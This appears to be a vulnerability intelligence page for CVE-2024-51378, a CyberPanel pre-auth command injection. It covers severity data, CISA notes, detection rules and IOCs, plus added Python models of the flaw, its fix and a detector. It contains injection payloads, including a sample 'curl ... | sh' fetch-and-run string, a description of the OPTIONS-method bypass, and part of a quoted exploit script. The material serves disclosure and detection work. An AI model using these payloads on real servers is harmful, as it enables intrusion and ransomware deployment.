CVE-2024-51378
Published 2024-10-29
Priority P1 (99) · critical · CVSS 3.1 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · Exploit · Ransomware · Initial access
CISA Known Exploited Vulnerability, remediation due 2024-12-25
Exploited in the wild
EPSS: 94.88% (99.9th percentile)
getresetstatus in dns/views.py and ftp/views.py in CyberPanel (aka Cyber Panel) before 1c0c6cb allows remote attackers to bypass authentication and execute arbitrary commands via /dns/getresetstatus or /ftp/getresetstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.
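The bypass class behind this CVE, as an added example rather than CyberPanel's own code: a request filter gated on request.method == 'POST' beside a view that does not restrict the method, and the hardened pair next to it. The Request class, the 'cat <statusfile>' command, the metacharacter set and the path allowlist are simplifying assumptions for this model, and the vulnerable path runs a shell, so it needs a POSIX sh.

```python
"""Model of the request-filter bypass behind CVE-2024-51378 and its fix.

Added example: none of this is CyberPanel's code. The Request class, the
'cat <statusfile>' command, the metacharacter set and the path allowlist are
simplifying assumptions. The vulnerable path runs a shell and needs POSIX sh.
"""
import re
import subprocess

SHELL_META = re.compile(r"[;\n`|$&<>]")          # what the filter rejects
SAFE_PATH = re.compile(r"^/[A-Za-z0-9_./-]+$")   # allowlist for the fixed view


class Request:
    """Minimal stand-in for a framework request: HTTP method plus parsed JSON body."""

    def __init__(self, method, body):
        self.method = method
        self.body = body


def sec_middleware_vulnerable(request):
    """Filter gated on the HTTP method: only POST bodies are inspected.

    Any other method (OPTIONS in the in-the-wild exploit) reaches the view
    with an uninspected body. Returns True when the request may proceed.
    """
    if request.method == "POST":
        for value in request.body.values():
            if SHELL_META.search(str(value)):
                return False
    return True


def getresetstatus_vulnerable(request):
    """View that does not restrict the method and builds a shell command
    from the 'statusfile' field (modelled here as 'cat <statusfile>')."""
    statusfile = request.body["statusfile"]
    out = subprocess.run("cat " + statusfile, shell=True,
                         capture_output=True, text=True)
    return {"status": 1, "requestStatus": out.stdout}


def sec_middleware_fixed(request):
    """Inspect every request body regardless of method."""
    for value in request.body.values():
        if SHELL_META.search(str(value)):
            return False
    return True


def getresetstatus_fixed(request):
    """Reject non-POST, validate the path against an allowlist, and pass it to
    the program as one argv element so no shell ever re-parses it."""
    if request.method != "POST":
        return {"status": 0, "error_message": "method not allowed"}
    statusfile = str(request.body.get("statusfile", ""))
    if not SAFE_PATH.match(statusfile) or ".." in statusfile:
        return {"status": 0, "error_message": "invalid statusfile"}
    out = subprocess.run(["cat", statusfile], capture_output=True, text=True)
    return {"status": 1, "requestStatus": out.stdout}


def dispatch(request, middleware, view):
    """Run the filter, then the view, the way a middleware chain would."""
    if not middleware(request):
        return {"status": 0, "error_message": "blocked by middleware"}
    return view(request)


# Constructed payload: the shell sees two commands, the second attacker-chosen.
INJECTED = {"statusfile": "/dev/null; echo INJECTED"}
BENIGN = {"statusfile": "/dev/null"}


if __name__ == "__main__":
    for method in ("POST", "OPTIONS"):
        print(method, "vulnerable:", dispatch(Request(method, INJECTED),
              sec_middleware_vulnerable, getresetstatus_vulnerable))
        print(method, "fixed:     ", dispatch(Request(method, INJECTED),
              sec_middleware_fixed, getresetstatus_fixed))
```

The point of the model is that the filter and the view disagree about which methods matter: the filter assumes only POST carries a body, the view accepts any method and reads the body anyway. The fix closes both gaps independently, so either change alone would already stop the chain shown here.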
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cyberpanel | cyberpanel | < 2.3.8 | 2.3.8 |
Detection & IOCs (extracted from sources)
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS CyberPanel getresetstatus statusfile Parameter Command Injection Attempt (CVE-2024-51378)"; flow:established,to_server; http.uri; pcre:"/^\x2f(?:dns|ftp)/"; content:"/getresetstatus"; fast_pattern; endswith; http.request_body; content:"|22|statusfile|22 3a|"; pcre:"/^[^\x26]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,attacke.rs/posts/cyberpanel-command-injection-vulnerability/; reference:cve,2024-51378; classtype:attempted-admin; sid:2059721; rev:1; metadata:affected_product CyberPanel, attack_target Web_Server, tls_state TLSDecrypt, created_at 2025_01_28, cve CVE_2024_51378, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2025_01_28, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
yara
regex: uid=[0-9]+.*gid=[0-9]+.* AND requestStatus":
- The exploit bypasses secMiddleware (which only validates POST requests) by sending an OPTIONS HTTP request to /ftp/getresetstatus or /dns/getresetstatus with shell metacharacters in the 'statusfile' JSON body parameter.
- Detect OPTIONS method requests to URIs ending in /getresetstatus under /dns/ or /ftp/ paths; this is the bypass vector. A POST carrying shell metacharacters is rejected by secMiddleware, but the view itself does not restrict the HTTP method, so an OPTIONS request with the same body is never inspected.
- Inspect the HTTP request body for the 'statusfile' key followed by shell metacharacters, raw or percent-encoded: semicolon (; / %3B), newline (\n / %0A), backtick (` / %60), pipe (| / %7C), or dollar sign ($ / %24). This is the set the ET rule (sid 2059721) matches.
- The attacker first performs a GET / to harvest the csrftoken cookie, then replays it in the X-CSRFToken header of the OPTIONS exploit request. Correlate a GET / followed shortly by an OPTIONS to /ftp/getresetstatus or /dns/getresetstatus from the same source IP.
- Successful exploitation returns a JSON response containing the 'requestStatus' key with command output (for example uid=/gid= strings from id). The endpoint returns 'requestStatus' on legitimate use too, so alert on 200 responses to these endpoints whose 'requestStatus' value contains such command output; the regex above encodes this.
- The PSAUX ransomware group exploited this vulnerability at scale against over 22,000 CyberPanel instances in October 2024. Prioritize detection on internet-facing CyberPanel hosts (Shodan: html:"CyberPanel").
- Versions through 2.3.6 and the unpatched 2.3.7 release are affected. The fix is present starting from commit 1c0c6cb. Verify the installed commit hash, not just the version number, as 2.3.7 shipped both patched and unpatched builds.
- The Snort/ET rule (sid:2059721) is tagged tls_state TLSDecrypt: on HTTPS-protected CyberPanel instances it only fires if the sensor sees decrypted traffic, so position it behind TLS termination or a decryption point.
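The detection bullets above, implemented as an added example over constructed HTTP transaction records (this is not code from the original page or from any of the cited sources). The URI match and the metacharacter set follow the ET rule quoted above, the response check follows the uid=/gid= regex, and the GET / to OPTIONS correlation uses a 30-second window, which is an assumed value; the field names of the transaction records are also assumed.

```python
"""Detection logic for CVE-2024-51378 exploitation, run over constructed HTTP
transaction records. Added example; record field names and the 30 s
correlation window are assumptions. URI and metacharacter logic follow the
ET rule quoted on the page; the response check follows its uid=/gid= regex."""
import re
from datetime import datetime, timedelta

# ET rule: URI starts with /dns or /ftp and ends with /getresetstatus
TARGET_URI = re.compile(r"^/(?:dns|ftp)/(?:.*/)?getresetstatus$")
STATUSFILE_KEY = re.compile(r'"statusfile":')
# Same set as the rule's pcre: ; \n ` | $ raw or percent-encoded
SHELL_META = re.compile(r"[;\n`|$]|%3[Bb]|%0[Aa]|%60|%7[Cc]|%24")
# Response regex from the IOC list: id(1)-style output next to requestStatus
EXEC_OUTPUT = re.compile(r"uid=[0-9]+.*gid=[0-9]+")


def is_target_uri(uri):
    return TARGET_URI.match(uri.split("?", 1)[0]) is not None


def statusfile_has_metachars(body):
    m = STATUSFILE_KEY.search(body)
    if m is None:
        return False
    tail = body[m.end():].split("&", 1)[0]   # the rule stops at the first '&'
    return SHELL_META.search(tail) is not None


def response_shows_exec(resp_body):
    return '"requestStatus":' in resp_body and EXEC_OUTPUT.search(resp_body) is not None


def analyze(transactions, window=timedelta(seconds=30)):
    """Return one finding per suspicious request to the two endpoints."""
    last_root_get = {}   # src_ip -> time of its most recent GET /
    findings = []
    for tx in sorted(transactions, key=lambda t: t["ts"]):
        if tx["method"] == "GET" and tx["uri"].split("?", 1)[0] == "/":
            last_root_get[tx["src_ip"]] = tx["ts"]
            continue
        if not is_target_uri(tx["uri"]):
            continue
        reasons = []
        if tx["method"] != "POST":
            reasons.append("non_post_method_bypass")
            prior = last_root_get.get(tx["src_ip"])
            if prior is not None and tx["ts"] - prior <= window:
                reasons.append("csrftoken_harvest_then_exploit")
        if statusfile_has_metachars(tx.get("body", "")):
            reasons.append("statusfile_metachar")
        if tx.get("status") == 200 and response_shows_exec(tx.get("resp_body", "")):
            reasons.append("exec_output_in_response")
        if reasons:
            findings.append({"ts": tx["ts"], "src_ip": tx["src_ip"],
                             "method": tx["method"], "uri": tx["uri"],
                             "reasons": reasons})
    return findings


T0 = datetime(2024, 10, 28, 3, 14, 0)
SAMPLE_TRANSACTIONS = [   # constructed records, not real traffic
    {"ts": T0, "src_ip": "203.0.113.7", "method": "GET", "uri": "/",
     "body": "", "status": 200, "resp_body": "<html>CyberPanel login</html>"},
    {"ts": T0 + timedelta(seconds=2), "src_ip": "203.0.113.7", "method": "OPTIONS",
     "uri": "/ftp/getresetstatus",
     "body": '{"statusfile": "/dev/null; id", "csrftoken": "constructed"}',
     "status": 200,
     "resp_body": '{"status": 1, "requestStatus": "uid=0(root) gid=0(root) groups=0(root)\\n"}'},
    {"ts": T0 + timedelta(minutes=5), "src_ip": "192.0.2.10", "method": "POST",
     "uri": "/dns/getresetstatus",
     "body": '{"statusfile": "/home/cyberpanel/dns-reset.status"}', "status": 200,
     "resp_body": '{"status": 1, "requestStatus": "Running..", "abort": 0}'},
    {"ts": T0 + timedelta(minutes=9), "src_ip": "198.51.100.23", "method": "OPTIONS",
     "uri": "/dns/getresetstatus",
     "body": '{"statusfile": "/tmp/x%7Ccurl%20198.51.100.23/a%7Csh"}', "status": 200,
     "resp_body": '{"status": 0, "error_message": "file not found"}'},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_TRANSACTIONS):
        print(f["ts"], f["src_ip"], f["method"], f["uri"], ",".join(f["reasons"]))
```

The third record is the benign case the detection has to tolerate: a POST with a clean path and the endpoint's normal 'requestStatus' reply produces no finding, while the percent-encoded pipe in the fourth record is caught even though no command output came back.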
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| vulncheck | | 10.0 | CRITICAL | |
| cisa | | 9.8 | CRITICAL | |
CISA
CyberPanel Incorrect Default Permissions Vulnerability
cisa · 2024-12-04 · CVSS 9.8
CVE-2024-51378 [CRITICAL] CWE-276 CyberPanel Incorrect Default Permissions Vulnerability
Vulnerability: CyberPanel Incorrect Default Permissions Vulnerability
Affected: CyberPersons CyberPanel
CyberPanel contains an incorrect default permissions vulnerability that allows for authentication bypass and the execution of arbitrary commands using shell metacharacters in the statusfile property.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://cyberpanel.net/KnowledgeBase/home/change-logs/ ; https://nvd.nist.gov/vuln/detail/CVE-2024-51378
Remediation Due Date: 2024-12-25
GHSA
GHSA-c45f-33wq-x2qc: getresetstatus in dns/views
ghsa_unreviewed · 2024-10-30
CVE-2024-51378 [CRITICAL] CWE-276 GHSA-c45f-33wq-x2qc: getresetstatus in dns/views
getresetstatus in dns/views.py and ftp/views.py in CyberPanel (aka Cyber Panel) before 1c0c6cb allows remote attackers to bypass authentication and execute arbitrary commands via /dns/getresetstatus or /ftp/getresetstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.
VulnCheck
CyberPanel Incorrect Default Permissions Vulnerability
vulncheck · 2024 · CVSS 10.0
CVE-2024-51378 [CRITICAL] CWE-276 CyberPanel Incorrect Default Permissions Vulnerability
CyberPanel contains an incorrect default permissions vulnerability that allows for authentication bypass and the execution of arbitrary commands using shell metacharacters in the statusfile property.
Affected: CyberPersons CyberPanel
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://censys.com/cve-2024-51378/; https://gist.github.com/gboddin/d78823245b518edd54bfc2301c5f8882; https://nvd.nist.gov/vuln/detail/CVE-2024-51378; https://www.bleepingcomputer.com/news/security/massive-psaux-ransomware-attack-targets-22-000-cyberpanel-instances/; https://www.cve.org/CVERecord?id=CVE-2024-51378; ht
Suricata
ET WEB_SPECIFIC_APPS CyberPanel getresetstatus statusfile Parameter Command Injection Attempt (CVE-2024-51378)
suricata · 2025-01-28 · CVSS 10.0
CVE-2024-51378 [CRITICAL] ET WEB_SPECIFIC_APPS CyberPanel getresetstatus statusfile Parameter Command Injection Attempt (CVE-2024-51378)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS CyberPanel getresetstatus statusfile Parameter Command Injection Attempt (CVE-2024-51378)"; flow:established,to_server; http.uri; pcre:"/^\x2f(?:dns|ftp)/"; content:"/getresetstatus"; fast_pattern; endswith; http.request_body; content:"|22|statusfile|22 3a|"; pcre:"/^[^\x26]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,attacke.rs/posts/cyberpanel-command-injection-vulnerability/; reference:cve,2024-51378; classtype:attempted-admin; sid:2059721; rev:1; metadata:affected_product CyberPanel, attack_target Web_Server, tls_state TLSDecrypt, created_at 2025_01_28, c
Exploit-DB
CyberPanel 2.3.6 - Remote Code Execution (RCE)
exploitdb · 2025-04-11 · CVSS 10.0
CVE-2024-51378 [CRITICAL] CyberPanel 2.3.6 - Remote Code Execution (RCE)
---
# Exploit Title: CyberPanel 2.3.6 - Remote Code Execution (RCE)
# Date: 10/29/2024
# Exploit Author: Luka Petrovic (refr4g)
# Vendor Homepage: https://cyberpanel.net/
# Software Link: https://github.com/usmannasir/cyberpanel
# Version: 2.3.5, 2.3.6, 2.3.7 (before patch)
# Tested on: Ubuntu 20.04, CyberPanel v2.3.5, v2.3.6, v2.3.7 (before patch)
# CVE: CVE-2024-51378
# PoC Repository: https://github.com/refr4g/CVE-2024-51378
# Blog Post: https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/
#!/usr/bin/python3
import argparse
import httpx
import sys
RED = "\033[91m"
GREEN = "\033[92m"
CYAN = "\033[96m"
MAGENTA = "\033[95m"
YELLOW = "\033[93m"
RESET = "\033[0m"
print(f"{RED}CVE-2024-51378{RESET} - Remote Code Execut
Metasploit
CyberPanel Multi CVE Pre-auth RCE
metasploit · CVSS 9.8
CVE-2024-51567 [CRITICAL] CyberPanel Multi CVE Pre-auth RCE
This module exploits three separate unauthenticated Remote Code Execution vulnerabilities in CyberPanel: - CVE-2024-51567: Command injection vulnerability in the "upgrademysqlstatus" endpoint. - CVE-2024-51568: Command Injection via the "completePath" parameter in the "outputExecutioner" sink. - CVE-2024-51378: Unauthenticated RCE in "/ftp/getresetstatus" and "/dns/getresetstatus". These vulnerabilities were exploited in ransomware campaigns affecting over 22,000 CyberPanel instances, with the PSAUX ransomware being the primary actor in these attacks.
Nuclei
CyberPanel - Command Injection
nuclei · CVSS 9.8
CVE-2024-51378 [CRITICAL] CyberPanel - Command Injection
CyberPanel contains a command injection vulnerability in the /ftp/getresetstatus and /dns/getresetstatus endpoints. The vulnerability exists due to improper validation of the 'statusfile' parameter, which is directly used in a shell command. The security middleware only validates POST requests, allowing attackers to bypass protection using OPTIONS requests.
Template:
id: CVE-2024-51378
info:
  name: CyberPanel - Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    CyberPanel contains a command injection vulnerability in the /ftp/getresetstatus and /dns/getresetstatus endpoints. The vulnerability exists due to improper validation of the 'statusfile' parameter, which is directly used in a shell command. The security middleware only validates P
Trendmicro
Earth Lamia Develops Custom Arsenal to Target Multiple Industries
blogs_trendmicro · 2025-05-27
Trend™ Research has been tracking an active APT threat actor named Earth Lamia, targeting multiple industries in Brazil, India and Southeast Asia countries at least since 2023. The threat actor primarily exploits vulnerabilities in web applications to gain access to targeted organizations.
By: Joseph C Chen
2025/05/27
Summary
- Trend Research has identified Earth Lamia as an APT threat actor that exploits vulnerabilities in web applications to gain access to organizations, using various techniques for data exfiltration.
- Earth Lamia develops and customizes hacking tools to evade detection, such as PULSEPACK and BypassBoss.
- Earth Lamia has primarily targeted
Greynoiseio
NoiseLetter November 2024
blogs_greynoiseio
References
- https://cwe.mitre.org/data/definitions/420.html
- https://cwe.mitre.org/data/definitions/78.html
- https://cyberpanel.net/KnowledgeBase/home/change-logs/
- https://cyberpanel.net/blog/detials-and-fix-of-recent-security-issue-and-patch-of-cyberpanel
- https://github.com/usmannasir/cyberpanel/commit/1c0c6cbcf71abe573da0b5fddfb9603e7477f683
- https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/
- https://www.bleepingcomputer.com/news/security/massive-psaux-ransomware-attack-targets-22-000-cyberpanel-instances/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-51378
Published: 2024-10-29
Added to CISA KEV: 2024-12-04
Exploited in the wild